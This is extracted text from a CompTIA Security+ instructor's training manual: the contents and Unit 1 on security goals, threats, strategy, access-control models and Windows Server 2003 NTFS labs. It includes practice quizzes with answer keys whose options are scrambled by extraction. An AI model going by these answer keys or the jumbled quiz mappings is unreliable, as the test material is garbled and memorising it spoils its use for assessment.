Ebook Security+ CompTia

CompTIA Security+ Certification Instructors Edition
ILT Series
COPYRIGHT Axzo Press. All rights reserved. No part of this work may be reproduced, transcribed, or used in any form or by any meansgraphic, electronic, or mechanical, including photocopying, recording, taping, Web distribution, or information storage and retrieval systemswithout the prior written permission of the publisher. For more information, go to www.courseilt.com.
Trademarks
ILT Series is a trademark of Axzo Press. Some of the product names and company names used in this book have been used for identification purposes only and may be trademarks or registered trademarks of their respective manufacturers and sellers.
Disclaimer
We reserve the right to revise this publication and make changes from time to time in its content without notice.
Contents
Introduction
Topic A: Topic B: Topic C: Topic D:
About the manual............................................................................... vi Setting student expectations .............................................................. xi Classroom setup................................................................................ xix Support.............................................................................................xxvii
Security overview
1-1
Topic A: Introduction to network security....................................................... 1-2 Topic B: Understanding security threats ......................................................... 1-5 Topic C: Creating a secure network strategy................................................... 1-9 Topic D: Windows Server 2003 server access control ................................... 1-13 Unit summary: Security overview................................................................... 1-24
Authentication
2-1
Topic A: Introduction to authentication........................................................... 2-2 Topic B: Kerberos............................................................................................ 2-8 Topic C: Challenge Handshake Authentication Protocol ............................... 2-14 Topic D: Digital certificates............................................................................ 2-16 Topic E: Security tokens ................................................................................ 2-19 Topic F: Biometrics........................................................................................ 2-22 Unit summary: Authentication ........................................................................ 2-30
Attacks and malicious code
3-1
Topic A: Denial of service attacks................................................................... 3-2 Topic B: Man-in-the-middle attacks............................................................... 3-15 Topic C: Spoofing........................................................................................... 3-18 Topic D: Replays ............................................................................................ 3-25 Topic E: TCP session hijacking...................................................................... 3-27 Topic F: Social engineering ........................................................................... 3-29 Topic G: Attacks against encrypted data ........................................................ 3-32 Topic H: Software exploitation....................................................................... 3-37 Unit summary: Attacks and malicious code.................................................... 3-51
Remote access
4-1
Topic A: Securing remote communications..................................................... 4-2 Topic B: Authentication .................................................................................. 4-5 Topic C: Virtual private networks .................................................................. 4-16 Topic D: Telecommuting vulnerabilities ........................................................ 4-27 Unit summary: Remote access ........................................................................ 4-31
E-mail
5-1
Topic A: Secure e-mail and encryption ........................................................... 5-2 Topic B: PGP and S/MIME encryption.......................................................... 5-13 Topic C: E-mail vulnerabilities....................................................................... 5-24 Unit summary: E-mail ..................................................................................... 5-30
Web security
6-1
Topic A: SSL/TLS protocol............................................................................. 6-2
ii
CompTIA Security+ Certification Topic B: Vulnerabilities of Web tools ........................................................... 6-15 Topic C: Configuring Internet Explorer security ........................................... 6-30 Unit summary: Web security .......................................................................... 6-40
Directory and file transfer services
7-1
Topic A: Introduction to directory services..................................................... 7-2 Topic B: File transfer services........................................................................ 7-10 Topic C: File sharing...................................................................................... 7-25 Unit summary: Directory and file transfer services ........................................ 7-28
Wireless and instant messaging
8-1
Topic A: IEEE 802.11 ..................................................................................... 8-2 Topic B: WAP 1.x and WAP 2.0 ................................................................... 8-10 Topic C: Wired equivalent privacy ................................................................ 8-23 Topic D: Instant messaging ............................................................................ 8-36 Unit summary: Wireless and instant messaging ............................................. 8-42
Network devices
9-1
Topic A: Understanding firewalls ................................................................... 9-2 Topic B: Routers ............................................................................................. 9-9 Topic C: Switches .......................................................................................... 9-16 Topic D: Telecom, cable modem, and wireless devices................................. 9-19 Topic E: Securing remote access ................................................................... 9-23 Topic F: Intrusion detection systems ............................................................. 9-26 Topic G: Network monitoring ........................................................................ 9-29 Unit summary: Network devices .................................................................... 9-36
Transmission and storage media
10-1
Topic A: Transmission media......................................................................... 10-2 Topic B: Storage media................................................................................. 10-11 Unit summary: Transmission and storage media........................................... 10-19
Network security topologies
11-1
Topic A: Security topologies.......................................................................... 11-2 Topic B: Network Address Translation.......................................................... 11-7 Topic C: Tunneling ....................................................................................... 11-21 Topic D: Virtual Local Area Networks ......................................................... 11-23 Unit summary: Network security topologies ................................................. 11-29
Intrusion detection
12-1
Topic A: Intrusion detection systems ............................................................. 12-2 Topic B: Network-based and host-based IDS ................................................ 12-5 Topic C: Active and passive detection .......................................................... 12-14 Topic D: Honeypots ...................................................................................... 12-20 Topic E: Incident response............................................................................ 12-25 Unit summary: Intrusion detection ................................................................ 12-28
Security baselines
13-1
Topic A: OS/NOS hardening.......................................................................... 13-2 Topic B: Network hardening......................................................................... 13-14 Topic C: Application hardening .................................................................... 13-23 Topic D: Workstations and servers ............................................................... 13-43 Unit summary: Security baselines ................................................................. 13-55
iii Cryptography 14-1

Topic A: Concepts of cryptography................................................................ 14-2 Topic B: Public Key Infrastructure (PKI)...................................................... 14-11 Topic C: Key management and life cycle...................................................... 14-18 Topic D: Setting up a certificate server ......................................................... 14-26 Unit summary: Cryptography......................................................................... 14-41
Physical security
15-1
Topic A: Access control.................................................................................. 15-2 Topic B: Environment ................................................................................... 15-12 Unit summary: Physical security.................................................................... 15-18
Disaster recovery and business continuity
16-1
Topic A: Disaster recovery ............................................................................. 16-2 Topic B: Business continuity......................................................................... 16-11 Topic C: Policies and procedures .................................................................. 16-14 Topic D: Privilege management .................................................................... 16-24 Unit summary: Disaster recovery and business continuity ............................ 16-28
Computer forensics and advanced topics
17-1
Topic A: Understanding computer forensics .................................................. 17-2 Topic B: Risk identification............................................................................ 17-9 Topic C: Education and training.................................................................... 17-11 Topic D: Auditing .......................................................................................... 17-14 Topic E: Documentation................................................................................ 17-17 Unit summary: Computer forensics and advanced topics .............................. 17-21
Certification exam objectives map Course summary
A-1 S-1
Topic A: Comprehensive exam objectives ......................................................A-2 Topic A: Course summary ............................................................................... S-2 Topic B: Continued learning after class .......................................................... S-7
Glossary Index
G-1 I-1
xxviii
CompTIA Security+ Certification
11
Unit 1 Security overview

Unit time: 60 minutes Complete this unit, and youll know how to:
A Discuss network security. B Discuss security threat trends and their
ramifications.
C Determine the factors involved in creating
a secure network strategy.

D Control access to a Windows Server 2003
server.
12
Topic A: Introduction to network security

Explanation As personal and business-critical applications become more prevalent on the Internet, network-based applications and services can pose security risks to all information resources. Network security has not been given the attention it deserves, information is an asset, and must be protected. Without adequate protection or network security, a company is highly susceptible to a financial or commercial loss. The fear of a security breach can be just as debilitating to a business as an actual breach. The distrust of the Internet can limit business opportunities for organizations, especially those that are 100% Web-based. Its imperative that organizations enact security policies and procedures and incorporate safeguards that are effective and perceived effective by potential customers. Network security is the process by which digital information assets are protected. The goals of network security are to maintain integrity, protect confidentiality, and assure availability. This includes, but is not limited to, enforcing copyright and privacy laws, protecting against data loss, and ensuring systems are available on an uninterrupted basis. The growth of computing has generated enormous advances in the way people live and work. For the Internet to achieve its potential usefulness, its important that all networks are protected from threats and vulnerabilities. A threat is defined as any activity that poses a danger to your information. A vulnerability is a weakness in a system, such as misconfigured hardware or software, poor design, or end-user carelessness. Threats exploit vulnerabilities in order to gain unauthorized access to a network. Security risks cannot be completely eliminated or prevented, but with effective risk management and assessment, the risks can be minimized to an acceptable level. What is acceptable depends on how much risk the individual or organization is willing to assume. The risk is worth assuming if the benefits of implementing the risk-reducing safeguards far exceed the costs. Effect of evolving technologies on security When networks were first implemented, they consisted of dumb terminals connected to a central mainframe computer. The mainframe was kept in a well-secured computer room and users could connect only via dumb terminals from approved locations over static, point-to-point connections. A username and password were required to access the system and user-access was restricted. Security was very simple given those circumstances. With the development of more extensive network infrastructures made up of hardware and software (specifically, PCs, LANs and WANs), global access to information dramatically increased, as did the need for advanced network security. The introduction of firewalls in 1995 allowed successful businesses to balance security with simple outbound access to the Internet (mostly for e-mail and Web surfing), creating a positive impact to the bottom line of those businesses. The growth of extranets realized tremendous corporate cost savings by connecting internal systems to business partners, by connecting sales-force automation systems to mobile employees, and by providing electronic commerce connections to business customers and consumers. The proliferation of firewalls began to be augmented by intrusion detection, authentication, authorization, and vulnerability assessment systems.
Security overview Today, companies are achieving a balance by keeping the bad guys out with increasingly complex ways of letting the good guys in. Managing risk
13
Security is critical for all types of Internet businesses, by protecting high-availability systems from intrusion and corruption, security technologies help companies build trust with their employees, suppliers, partners, and customersa trust that information is protected and transactions are reliable. When most people talk about security, they mean ensuring that users: 1 Can perform only tasks they are authorized to do 2 Can obtain only information they are authorized to have 3 Cannot cause damage to the data, applications, or operating environment of a system The word security connotes protection against malicious attack by outsiders; security also involves controlling the effects of errors and equipment failures. Anything that can protect against an attack can prevent random misfortune as well.
Goals of network security

The goal of implementing network security is to maintain an acceptable level of integrity, confidentiality, and availability concerning your data. Integrity Integrity refers to the assurance that data is not altered or destroyed in an unauthorized manner. Integrity is maintained when the message received is identical to the message sent. Even for data that is not confidential, data integrity must be maintained. For example, you might not care if anyone sees your routine business transaction, but you would certainly care if the transaction were modified. Confidentiality Confidentiality is the protection of data from unauthorized access by or disclosure to a third party. Whether it is customer data or internal company data, a business is responsible for protecting the privacy of its data. Proprietary company information that is sensitive in nature also needs to remain confidential. Only authorized parties should be granted access to information that has been identified as confidential. The transmission of such information should be performed in a secure manner, preventing any unauthorized access en route. Availability Availability is defined as the assurance that computer services can be accessed when needed, and is the opposite of denial-of-service attacks, which slow down or even crash systems by engulfing network equipment with useless noise. Applications require differing availability levels, depending on the business impact of downtime. For an application to be available, all components, including application and database servers, storage devices, and the end-to-end network, must provide continuous service. The increasing dependence of businesses and organizations on networked applications and the Internet, together with the convergence of voice with data, increases requirements for highly available applications. System downtime of any sort might result in lack of credibility, lower customer satisfaction, and lost revenues.
14
Do it!
A-1:
Discussing network security
Questions and answers

1 What are the goals of security? (Choose all that apply.)
A B C
Maintain integrity Protect confidentiality Assure availability Improve performance
2 Which one of the following types of access can be threats to networks? A B

C
Authorized Needed Unauthorized Invalid
3 Integrity is maintained when the message sent is identical to the message received. True or false?
True
4 Confidentiality is the protection of data from authorized disclosure to a third party. True or false?
False: It is the protection of data from unauthorized disclosure to a third party.
5 Availability is defined as the continuous operation of computing systems. True or false?

True
Security overview
15
Topic B: Understanding security threats

Explanation The goals of network security are integrity, confidentiality, and availability. Data threats are pervasive in todays society however, and continue to challenge even the most secure systems. Among these threats are: Corporate espionage The FBI estimates every year U.S. companies lose up to $100 billion in business profits because of information theft. This often stems from reports and confidential information being thrown in the trash. Identity theft According to the Identity Theft Resource Center, each year over 700,000 Americans have their personal information used illegally. Computer viruses Computer Economics magazine reports the estimated worldwide impact of malicious code was 13.2 billion dollars in the year 2001 alone. Each company must weigh the cost of network security against the cost of lost assets and decide how much they are willing to risk. When data integrity is compromised, an organization must incur extremely high costs to correct the consequences of attacks. If an unauthorized user makes changes to a Web site that provides the customers with the wrong information about specific items, the organization must further invest to correct the Web site and address any public relations issues with customers. When data confidentiality is compromised, the consequences to the organization are not always immediate, but they are usually costly. Unauthorized users might find scientific data on company research and steal it to use for their own competitive advantage. When application availability is compromised by network outages, organizations can lose millions of dollars in just a few hours. Unauthorized users can take down Web servers and not allow customers to view and obtain information they need. This could cause the customer to go elsewhere for services. The compromising of each of these three security goals can dearly cost an organization. Sometimes the costs are direct, such as when data integrity is compromised or when an e-commerce Web site is rendered unavailable by a denial of service attack. Other times, the costs are indirect, such as when corporate secrets have been stolen or when users lose productivity due to down time.
Sources of threats
There are four primary causes for compromised security: Technology weaknesses Configuration weaknesses Policy weaknesses Human error or malice
16
CompTIA Security+ Certification Technology weaknesses Computer and network technologies have intrinsic security weaknesses in the following areas: TCP/IP A communication protocol suite for routed networks, TCP/IP was designed as an open standard to facilitate communications. Due to its wide usage, there are plenty of experts and expert tools that can compromise this open technology. It cannot guard a network against message-modification attacks or protect connections against unauthorized-access attacks. Operating systems Such as UNIX, Linux, Windows NT and 95, and OS/2 need the latest patches, updates, and upgrades applied to protect users. Network equipment Routers, firewalls, and switches must be protected through the use of password protection, authentication, routing protocols, and firewalls. Configuration weaknesses Even the most secure technology can be misconfigured. Security problems are often caused by one of the following configuration weaknesses: Unsecured accounts User account information might be transmitted unsecurely across the network, exposing usernames and passwords to sniffers, which are programs for monitoring network activity, capable of capturing and analyzing IP packets on an Ethernet network or dial-up connection. System accounts with easily guessed passwords Poorly administered password policies can cause problems in this area. Misconfigured Internet services A common problem is to turn on Java and JavaScript in Web browsers, enabling attacks via hostile Java applets. Another problem is putting high-security data on a Web server; this type of data (social security numbers, credit card numbers) should be behind a firewall and require user authentication and authorization to access. Unsecured default settings Many products have default settings that enable security holes (for example, UNIX sendmail and X Windows). Misconfigured network equipment Misconfiguration of network devices can cause significant security problems. For example, misconfigured access lists, routing protocols, or Simple Network Management Protocol (SNMP) community strings can open up large security holes. Trojan horse programs Delivery vehicles for destructive code, these appear to be harmless programs but are enemies in disguise. They can delete data, mail copies of themselves to e-mail address lists, and open up other computers for attack. Vandals These software applications or applets can destroy a single file or a major portion of a computer system. Viruses These are the largest threat to network security and have proliferated in the past few years. They are designed to replicate themselves and infect computers when triggered by a specific event. The effect of some viruses is minimal and only an inconvenience, while others are more destructive and cause major problems, such as deleting files or slowing down entire systems.
Security overview Human error and malice Human error and malice constitute a significant percentage of breaches in network security. Even well trained and conscientious users can cause great harm to security systems, often without knowing it. Well-intentioned users can contribute to security breaches in several ways:
17
Accident The mistaken destruction, modification, disclosure, or incorrect classification of information. Ignorance Inadequate security awareness, lack of security guidelines, lack of proper documentation, lack of knowledge. Users might inadvertently give information on security weaknesses to attackers. Workload Too many or too few system administrators. Conversely, ill-willed employees or professional hackers and criminals can access valuable assets through deceit: Dishonesty Fraud, theft, embezzlement, and the selling of confidential corporate information. Impersonation Attackers might use the telephone to impersonate employees to persuade users or administrators to give out usernames, passwords, modem numbers, and so on. Disgruntled employees Those who have been fired, laid off, or reprimanded might infect the network with a virus or delete files. Usually one of the largest security threats, these people know the network and the value of the information on it. Snoops Individuals who take part in corporate espionage by gaining unauthorized access to confidential data and providing this information to competitors. Denial-of-service attacks These attacks engulf network equipment with useless noise, thereby causing systems to slow down or even crash.
18
Do it!
B-1:
Identifying security threats

1 Which of the following computer and network technologies have intrinsic security weaknesses? A B C
D
TCP/IP Operating systems Network equipment All of the above
2 What is a crime called in which one person masquerades under the identity of another?
A
Identity theft Confidentiality Integrity All of the above
B C D
3 Which of the following is not a primary cause of network security threats?

A
Encryption Technology weaknesses Policy weaknesses Configuration weaknesses Human error
B C D E
4 Trojan horses are destructive programs that masquerade as benign applications. True or false?
True
5 Which of the following is not considered a configuration weakness? A B C

D
Unsecured accounts Misconfigured Internet services Misconfigured access lists Human ignorance
Security overview
19
Topic C: Creating a secure network strategy

Explanation The most important goal of network security is to achieve the state where any action that is not expressly permitted is prohibited. To be successful, a network strategy must address both internal and external threats. Successful strategies look at technical threats and their appropriate responses. They are used to develop the necessary network security policies and procedures for the response effort. A strong security strategy defines policies and procedures and reduces risk across perimeter security, the Internet, intranets, and LANs. When planning a strong security strategy, here are some things to consider: Human factors Knowing your weaknesses Limiting access Achieving security through consistency Physical security Perimeter security Firewalls Web and file servers Access control Change management Encryption Intrusion detection systems Human factors Many security procedures fail because their designers do not truly consider the users. You might want to consider the following questions: Does your network security system recognize that a user has tried to log on to more than one computer at the same time? Can staff members who forgot to log off at work also log on from home using remote dial-up? Can staff members log on to the network from a machine other than their own? Is your security policy built into network management tools so the misconfiguration of a server or router is flagged and noticed? Can an employee remove a hard disk, or add a ZIP drive, CD-R, flash drive, or other removable storage device to a desktop without anyone noticing? Security must be sold to your users and compliance must be enforced. Users must understand and accept the need for security. To reduce your security risk, you must know where your users are, electronically and physically, and whether they are following security policy.
110
CompTIA Security+ Certification Knowing your weaknesses Every security system has vulnerabilities. Attack your own system to determine where your weaknesses are located. Once you identify your weaknesses, you can plug those holes effectively. Determine the areas that present the largest danger to your system and prevent access to them immediately. Add more security to these areas. Is your weakness an internal server, a firewall, a router, or improperly trained staff ? Develop a methodology for testing and ensuring your systems remain safe. Limiting access The security of a system is only as good as the weakest security level of any single host in the system. Not everyone needs to have authorization to every folder or document. Segment your network users, files, and servers. For example, staff members in the Accounting Department do not need access to personnel files in the Human Resource Department. The default access should be no access. From there, you open holes with permissions and authentication allowing authorized users to access resources. If you start from this premise, its easier than starting from open access. Achieving security through consistency Develop a change management process around your network. Whenever there are network upgrades, whether patches, the addition of new users, or updating a firewall, you should document the process and procedures. If you are thorough in documenting the process, you limit your security risks. When you add new users to the network, do you always do the same thing? What if you forget a step? Is your security breached? Be methodical and follow a written process. Physical security It makes no sense to install complicated software security measures when access to the hardware is not controlled. Require authorization into your network room and the different closets in which network equipment is kept; otherwise, unauthorized users can easily access and destroy network equipment in seconds. Perimeter security Perimeter security is controlling access to critical network applications, data, and services. The services offered include secure Web and file servers, gateways, remote access, and naming services. Each organization should be prepared to select perimeter security tools based on their network requirements and budget. Along with the network, for successful perimeter security, blueprints for all campus grounds and buildings are necessary. In addition, all hardware, PCs, and software components must be documented. Firewalls A firewall is a hardware or software solution that contains programs designed to enforce an organizations security policies by restricting access to specific network resources. The firewall creates a protective layer between the network and the outside world. The firewall has built-in filters that can be configured to deny unauthorized or dangerous materials from entering the network. Firewalls log attempted intrusions and create reports.
Security overview Web and file servers
111
Organizations must test mission-critical hosts, workstations, and servers for vulnerabilities. Determine if your organization has the in-house expertise and experience to successfully test the network. If not, outsourcing to a reputable security assessment organization is recommended. Access control Access control ensures that legitimate traffic is allowed into or out of your network. This is done by having users identify themselves via passwords to prove their identity at login. In addition, access must be permitted or denied for each application, function, and file. Most attacks against networks are instances when unauthorized people find a way through the login system. This type of attack happens by guessing or stealing a user identity that is recognized by the system. These attacks are successful because existing networks utilize access control systems, which merely involve entering a user identity together with a password. With this limited security, attacks are simple and common. Many systems do not log invalid password entries into their systems, allowing an attacker to be more persistent. Hackers can continue trying different passwords repeatedly without being noticed. Another type of access control is personal identification numbers (PINs). These are commonly used at banks. The only difference between passwords and PINs is that PINs are usually all numeric and only a few characters long. Security tokens are gaining popularity as well. This hardware plugs into computing devices and dynamically generates a new password at each login. This is done automatically for the user once the user authenticates with a password. Smartcards, with embedded chips, contain code that identifies its holder, or contain keys that can read and send encrypted data. These cards are becoming more popular and are very useful for maintaining security. Change management Change management is a set of procedures developed by network staff that are followed whenever a change is made to the network. Most organizations focus on servers and do not document changes to the backbone, which touches the entire network infrastructure. It is important to document changes to all areas of your IT infrastructure. Encryption Encryption ensures messages cannot be intercepted or read by anyone other than their intended audience. Encryption is usually implemented to protect data that is transported over the public network; it uses advanced algorithms to scramble messages and their attachments. Intrusion detection systems An intrusion detection system (IDS) provides 24/7 network surveillance. It analyzes packet data streams within the network and searches for unauthorized activity. When unauthorized activity is detected, the IDS can send alarms to a management console with details of the activity and can order other systems to cut off the unauthorized session.
112
Do it!
C-1:
Discussing strategies to secure your network

1 Ideally, the administrator should give everyone access to everything and start securing when a problem arises. True or false?
False: Start with a default of no access and assign permissions on a need-to-use basis.
2 Which of the following is considered a successful approach to network security? A B C D

E
Knowing your weaknesses Determining the cost Remembering human factors Controlling secrets All of the above
3 Which of the following is/are incorrect about firewalls? A B C

D
Restricts access to specific network resources Contains built-in filters Creates a protective layer between the network and the outside world Is a hardware only solution
4 Examples of access controls might include which of the following? A B C

D
Smartcards Security token PINs All of the above
Security overview
113
Topic D: Windows Server 2003 server access control

This topic covers the following CompTIA Security+ exam objectives.
# 1.1 Objective Recognize and be able to differentiate and explain the following access control models MAC DAC RBAC 5.5 Explain the following concepts of privilege management MAC / DAC / RBAC (Mandatory Access Control / Discretionary Access Control / Role Based Access Control)
Introducing server access control

Explanation Access control is a policy, software component, or hardware component that is used to restrict access to a resource. This could be a password, keypad, badge, or set of permissions granted to the resource. When applied, several levels of security must be passed: Identify The user must show identification. This might involve showing a badge or drivers license, entering a logon ID, or swiping a card. Authenticate The user is authenticated to the network. This can be accomplished with a password, PIN, hand scan, or signature. Authorize The system restricts the users access to a particular resource based on a predetermined set of policies.
MAC, DAC, and RBAC

In discussing access to a resource, three access control models must be addressed: Mandatory access control (MAC) Discretionary access control (DAC) Role-based access control (RBAC) MAC Mandatory access control (MAC) is a non-discretionary control used in high-security locations. Here, you classify all users and resources and assign a security level to the classification. Access requests are denied if the users security level does not match or exceed the security level of the resource. For example, military personnel must have a high-security clearance to read or revise secured documents.
114
CompTIA Security+ Certification DAC Discretionary access control (DAC) allows an owner of a file to dictate who can access the file and to what extent. The owner of the resource creates an access control list (ACL) to list the users with access and the type of access (permissions). Most operating systems provide some form of the read, write, execute, modify, and delete permissions. One of the drawbacks to this method is that each owner controls the access levels to his or her personal files. With inappropriate access control, confidential information can be accidentally or deliberately compromised, or resources can be rendered inaccessible. The assumption is that the owner of the file has the expertise to manage the access levels appropriately. RBAC Role-based access control (RBAC), not to be confused with rule-based access control, is based on the role a user plays in the organization. Instead of giving access to individual users, access control is granted to groups of users who perform a common function. This allows for centralized administration, where access to resources is defined based on roles, and each user is assigned one or more roles. This is considered a nondiscretionary access control.
Using NTFS to implement access control

Almost all network operating systems allow administrators to define or set DAC settings. Windows NT, 2000, Server 2003, and XP Professional computers set DAC values using Windows Explorer. To implement local file security on a Windows NT-based computer, you must convert the FAT partition(s) to NTFS format.
Security overview Do it!
115
D-1:
Converting to an NTFS system Heres why
Heres how
Tell students this activity will show them how to determine whether a file partition is FAT or NTFS, as well as how to convert a FAT partition to NTFS.
1 Log on to the Windows Server 2003 server as Administrator 2 Click Start Choose Run Type cmd Press e
To access the command window. To determine whether a file partition is FAT or NTFS. You will see the message, The type of the file system is FAT 32. E: is not dirty. This indicates that NTFS was not yet installed and there is no corruption on the drive.
The FAT partition in this lab will be designated as drive letter E. However, if you have more drives installed, this might be a higher letter than E:. Be sure students do not change drive C:.
3 At the command line, enter

chkntfs e:
4 At the command line, enter

convert e: /fs:ntfs
If students convert the system partition, theyll have to reboot for the conversion to take place.
To convert the FAT partition to NTFS.
5 If the drive has a volume label, enter it when prompted 6 At the command line, enter
chkntfs e:
Windows will then convert the drive to NTFS.
To verify that the drive is now NTFS.
7 Enter exit
To close the Command window.
116
Data confidentiality
Explanation After a secure file system is installed, you can begin to think about data confidentiality. Data confidentiality refers to making sure only those intended to have access to certain data actually have that access. With the FAT file system, this is not possible at the local level, but with NTFS, you can lock down both folders and files locally. NTFS can be used to protect data from intruders who might have physical access to the computer containing the data. Exhibit 1-1 shows the default NTFS permissions.
Exhibit 1-1: Default NTFS permissions on a Windows Server 2003 server Do it!
D-2:
Ensuring data confidentiality Heres why

Click Start and choose My Computer. This should be the drive that was converted from FAT to NTFS.
Heres how
In this activity, students will create a folder and files, assign NTFS permissions, and then verify whether the data is confidential.
1 Open My Computer Double-click the E: drive
2 Create a new folder called Confidentiality 3 Double-click the Confidentiality folder 4 Create a new folder called User1Folder 5 Right-click User1Folder Choose Properties 6 Activate the Security tab
The User1Folder Properties screen appears. The Security tab is displayed, as shown in Exhibit 1-1.
Security overview 7 Click Advanced 8 Clear Allow inheritable

permissions from parent to propagate to this object and all child objects. Include these with entries explicitly defined here. Youll be prompted to Copy, Remove, or Cancel.
117
9 Click Copy 10 Click OK 11 Click Add
To retain the permissions. To return to the Security tab. To start the process of adding access permissions for User1. The Select Users or Groups window appears.
12 Click Advanced 13 Click Find Now Under Search results, select

User1 To identify users and groups on the system. You might have to scroll to see User1.
Click OK twice 14 With User1 still highlighted, select Allow for Full Control
To add User1 to the access control list.
Full Control activates all other permissions in the list.

Make sure students don't remove User1.
15 Select each group in the list of Group or user names and Click Remove for each group Click OK 16 Double-click User1Folder 17 Close all windows and log off
To remove the Administrators, Creator Owner, System and Users groups from the access control list. Do not remove User1. To save the changes. You are denied access because you granted access to the folder only to User1.
Tell students User1 does not have a password.
18 Log on as User1 and navigate to the User1Folder 19 Close all windows and log off
To verify that User1 has access to the folder. You should be able to open the folder.
118
Data availability
Explanation Although it is important that data remains secure and confidential, it is just as important that the data is available when needed. Secured data that is inaccessible results in downtime and is detrimental to a business and its ability to serve customers. Technologies such as clustering and load balancing can help, but if NTFS permissions are assigned inappropriately, these features will not remedy the situation.
Do it!
D-3:
Making data available Heres why
Heres how
In this activity, students will examine how NTFS permissions affect a users access to resources.
1 Log on to the Windows Server 2003 server as Administrator 2 Open My Computer Double-click the E: drive 3 Create a new folder called Availability 4 Double-click the Availability folder 5 Create a folder called User2Folder 6 Right-click User2Folder Choose Properties 7 Activate the Security tab 8 Click Advanced 9 Clear Allow inheritable
permissions from parent to propagate to this object and all child objects. Include these with entries explicitly defined here. Youll be prompted to Copy, Remove, or Cancel. To open the User2Folder Properties window.
10 Click Remove 11 Click OK 12 Click Yes 13 Click Add 14 Click Advanced
To clear the permissions. To return to the Security tab. To acknowledge the Security message and continue. To open the Select Users or Groups window.
Security overview 15 Click Find Now Select User2 Click OK twice 16 With User2 still highlighted, select Allow for Full Control Click OK 17 Close all windows and log off
Point out to students that User2 does not require a password to log on.
119
You might have to scroll to see the user. To add User2 to the access control list. To assign User2s permissions.
To save the changes.
18 Log on as User2 19 Verify that you have access to e:\Availability\User2Folder 20 Close all windows and log off 21 Log on as Administrator 22 Delete the User2 account from the local security database 23 Create a new user, also named User2
Click Start, right-click My Computer and choose Manage. Expand Local Users and Groups. Select Users and delete User2. With Users selected, choose Action, New User. Enter User2 as the User name, clear User must change password at next logon and click Create. Click Close.
24 Display the Security tab in the properties of e:\Availability\User2Folder
Notice that the User2 account is no longer listed, but the accounts SID is.
25 Logon as User2 and try to access the e:\Availability\ User2Folder 26 Close all windows and log off
You are denied access to this folder.
120
Data integrity
Explanation After data is secured properly and available to the appropriate people, it is important to make sure the contents of the data have not been altered accidentally or intentionally. Malicious corruption is a problem, and can be done by a virus, worm, or hacker. Accidental changes, however, can also damage data integrity. For example, Windows Server 2003 file synchronization capabilities could easily lead to accidental corruption. Changes made to data that conflict with other changes to the same data could damage data integrity just as much as a hacker can. Environmental problems can lead to data integrity issues, such problems include; dust, surges, and excessive heat. Windows Server 2003 default permissions are configured in such a way that only the creator of a file and users who belong to the System Administrators group can change a file by default. Members of the Users group can view a file by default, but cannot make changes. To enable others to change a file, permissions have to be specifically assigned.
Security overview Do it!
121
D-4:
Maintaining data integrity Heres why
Heres how
1 Log on to the Windows Server 2003 server as User1 2 In My Computer, display the E: drive 3 Create a new folder called Integrity 4 Within the Integrity folder, create a new folder called User1Folder 5 Within User1Folder, create a new text document 6 Type This document has not
been modified accidentally or intentionally.
In the new text document.
7 Save the file as

New Text Document
8 Close the document 9 Log off User1 10 Log on as User2 11 Navigate to e:\Integrity\User1Folder 12 From the New Text Document, remove the word not 13 Try to save the file to save the changes 14 Close all windows and log off User2
You did change the default permissions to e:\Integrity\User1Folder, so you can still view the contents of the file as User2. You receive an error message that you can't save the file. The data integrity of the file is maintained.
122
Data encryption
Explanation With NTFS, you are not limited to folder- and file-level security. Another function of NTFS is the ability to encrypt data. Encryption is the process of taking readable data and making it unreadable. Encryption is commonly used for remote data transfer, but it can also be used for local security. Laptop users might want to use NTFS to secure and encrypt their data in the event the laptop is stolen. While this solution is not 100% effective, it does make it more difficult to hack into your system. Windows Server 2003 offers a very easy way to encrypt files on an NTFS partition.
Do it!
D-5:
Encrypting data Heres why
Heres how
This activity demonstrates how to encrypt data within a file.
1 Log on to the Windows Server 2003 server as User2 2 In My Computer, open the E: drive 3 Create a new folder called Encryption 4 Within the Encryption folder, create a new folder called User2Folder 5 Within User2Folder, create a new text document Edit the content to read
This document is for my eyes only.
6 Save the document as

Private Document
Close the document 7 Right-click the document Choose Properties
Security overview 8 Click Advanced
123
Check Encrypt contents to

secure data
Click OK 9 Click OK a second time
10 Select the Encrypt the file only radio button Click OK 11 Log off as User2 12 Log on as User1 13 Try to access the Private Document file in e:\Encryption\User2Folder 14 Logoff User 1
Access should be denied. You'll also notice the file name displays in green to indicate it's been encrypted.
124
Unit summary: Security overview

Topic A In this topic we discussed the importance of network security. You learned that network security is the process by which digital information assets are protected. You also learned the goals of network security: integrity, confidentiality, and availability. You learned that confidentiality is the protection of data from unauthorized disclosure to a third party, availability is the continuous operation of computing systems, and integrity is the assurance that data has not been altered or destroyed. In this topic, you learned about the types of threats and their ramifications. You learned there are four primary causes for network security breaches: technology weaknesses, configuration weaknesses, policy weaknesses, and human error or malice. In this topic, you learned about the goals of network security. You learned the most important goal of network security is to achieve the state where any action that is not expressly permitted is prohibited. You also learned how to create a secure network strategy. You learned that the goal in developing a security policy is to define the organizations expectations for computer and network use. In this topic, you learned about the three methods of access control: MAC, DAC and RBAC. You implemented network security on an NTFS system and learned how to ensure data confidentiality, availability and integrity. You also learned how to encrypt data.
Topic B
Topic C
Topic D
Review questions
1 What file systems are compatible with Windows NT 4.0?
A
FAT
B FAT32 C OSPF
D
NTFS
2 Which of the following commands will convert a FAT partition to NTFS? A update C: /FS:NTFS B upgrade C: /FS:NTFS
C
convert C: /FS:NTFS
D convert C: /NTFS
Security overview 3 Which of the following is the best definition of data confidentiality? A Data that has not been tampered with intentionally or accidentally B Data that has been scrambled for remote transmission
C
125
Data that is secured so only the intended people have access
D Data that can be accessed when it is needed 4 Which of the following is the best definition of data availability? A Data that has not been tampered with intentionally or accidentally B Data that has been scrambled for remote transmission C Data that is secured so only the intended people have access
D
Data that can be accessed when it is needed
5 How can data confidentiality affect data availability? A They are two independent areas and do not affect each other B For data to be available, it cannot be confidential
C
Data that is secured too strongly might conflict with the availability
D Data that is secured too weakly might conflict with the availability 6 Which of the following is the best definition of data integrity?
A
Data that has not been tampered with intentionally or accidentally
B Data that has been scrambled for remote transmission C Data that is secured so only the intended people have access D Data that can be accessed when it is needed 7 Which of the following can damage data integrity? (Choose all that apply.)
A B C D
Viruses Worms Hackers Trojan Horses
126
CompTIA Security+ Certification 8 Data Integrity can also be threatened by environmental hazards such as dust, surges, and excessive heat. True or false?
True
9 Which of the following is the best definition of encryption? A Data that has not been tampered with intentionally or accidentally
B
Data that has been scrambled for remote transmission
C Data that is secured so only the intended people have access D Data that can be accessed when it is needed
21
Unit 2 Authentication
A Create strong passwords and store them
securely.
B Discuss the Kerberos authentication
process.
C Explain how CHAP works. D Explain how digital certificates are created
and why they are used.

E Discuss what tokens are and how they
